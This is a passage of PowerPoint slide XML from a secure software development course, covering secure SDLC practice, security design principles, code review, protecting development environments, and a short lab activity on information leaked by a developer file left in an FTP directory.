              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{395C8554-A04B-4612-81EF-09B644242122}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="4687275" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design your software to be secure even if its source code were known to an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The more secrets a system depends on for security, the more prone it is to attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every secret creates a potential failure point.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security measures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect your source code, documentation, and data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assign team members with separate responsibilities and access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect development, testing, and production environments.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D11C8605-97F4-4B09-98EF-435AEACC706B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Development Process Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7172" name="Picture 4" descr="Image result for security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809" y="1246502"/>
            <a:ext cx="4896494" cy="55085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p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5256576" y="3646732"/>
          <a:ext cx="3128015"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6340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CB1089-FB58-4E13-BD21-175D2A4AC62D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69FA289B-B3CE-4EE6-839E-F64AE2B0AD86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use established OWASP models and standards to implement a secure SDLC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examine each phase or aspect of your development processes, and identify how you can address security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include security when you define scope and requirements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify functional as well as non-functional security requirements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure that security requirements flow into test cases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use threat modeling ("architectural risk analysis") to identify and prioritize risks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include security reviews in the development phase.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use code analysis tools to help identify security defects as they emerge.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a variety of testing methods throughout development to ensure that security problems don't appear as the project progresses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As you fix security defects, create new automated unit tests to alert you if the problem you fixed reappears.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Establish processes and software features so you are notified immediately when security issues are found.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Establish ongoing monitoring and testing to identify when new security issues emerge over time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stay apprised of vulnerabilities in systems and modules that your code depends </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on, such as the operating system it runs on, web servers, database servers, cloud </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>services, and so forth.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17CB140C-7A98-4E40-933B-1B69C7945D25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrate Security into Your Development Processes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{588F9CFB-0978-4C25-8DA8-3C3129B3C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69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1E064C-2EC0-4AE3-BF6D-0BB36D37865D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6590D48F-3DEE-4E0F-836D-01D884F8EBA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Openness</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assume that attackers have all information they need to exploit your app.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Fail-safes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initialize to the most secure default settings, so that if a function were to fail, the software would end up in the most secure state.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Least privilege</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ask only for the permissions that are absolutely needed by your app, and try to design your app to need as few permissions as possible.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Resource economy</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be prudent with shared resources by limiting their use and relying only on trusted sources.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Complete Mediation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thoroughly check and double-check your code for any flaws or vulnerabilities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AE38E96-52DC-482D-AED0-2337E7135DAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Follow Principles of Security Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F36A6EE1-6D70-4A74-B503-9B49C9082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398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Image result for thinking png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="19749"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3352800" y="1125254"/>
            <a:ext cx="22860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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="2580742"/>
            <a:ext cx="8460150" cy="3860800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scan your code and consider how you might attack it yourself. Consider, for example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What would happen if the module is provided with unexpected inputs?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Would timing problems or delays between successive calls expose race conditions?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does the module expose any sensitive information?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What would happen if the user has different permissions than you normally intend?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What would happen if the software runs from a different location than usual?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lead another competent programmer through your code line-by-line, as you explain how each unit works. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often, you'll find your own problems just by having to explain what the code does.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Others may spot problems that you don't, because you are so familiar with the code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Develop and use a security review checklist, using lists of common </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>vulnerabilities and attacks as a guide.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify and Correct Security Issues During Development</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B7BB715-CCE8-4073-915B-D7936CE0A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897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5256F1-01D3-4ED3-AC42-8106914E0BE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F9C1C4F-D121-4D87-A281-BB979A423E5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="8460150" cy="5251160"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keep development, testing, and production environments completely separated, and control access to them by network users and deployment scripts through different assignable roles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If possible, separate responsibilities and access to different environments so only those who require access to a particular environment have access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect development, testing, and production environments from physical access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect the computers that developers use for development. For example, encrypt local storage, require developers to log out when walking away from their desk, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid using public code repositories.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77A74F93-DA5E-41F7-999E-5EEF556EA162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure the Development Environment (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68F727DB-9D38-4A43-AD53-E3EC6E36F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3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5256F1-01D3-4ED3-AC42-8106914E0BE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F9C1C4F-D121-4D87-A281-BB979A423E5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="8460150" cy="5251160"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure your code repository is on a secure system that is protected from unauthorized physical and network access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store code backups only in a secure storage location.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Maintain secure logs of all code check-ins and check-outs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monitor who accesses the repository, when, and from where.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Audit code frequently to verify that no malicious functions or vulnerabilities are added into production.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide developers with realistic sample data to use for programming and testing instead of actual data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When it is necessary to destroy any source code, sensitive data, assets, or backups,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>make sure they are destroyed securely. Follow compliance requirements, if applicable.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77A74F93-DA5E-41F7-999E-5EEF556EA162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure the Development Environment (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D071E28-0A1B-4B90-A5EA-95EB193D2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5804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0243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DF4690-7748-41A9-A54C-A85922757B21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14A2AC36-FE0A-4A18-8AA7-E0B2A37D0D5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One of the files in the FTP directory seems to be a programming artifact left behind by a software developer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You will try to gain access to the file as an attacker might do, and will examine the information that might be leaked by such a file.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5B4D91E-FD96-436B-A4D6-2CEA3C4E3939}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity: Managing Software Development Process Risks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F8D00D1-7D60-461C-ADC8-4524E34C97DF}"/>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6"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3403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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What vulnerabilities will provide the greatest challenge in your own software projects?</a:t>
            </a:r>
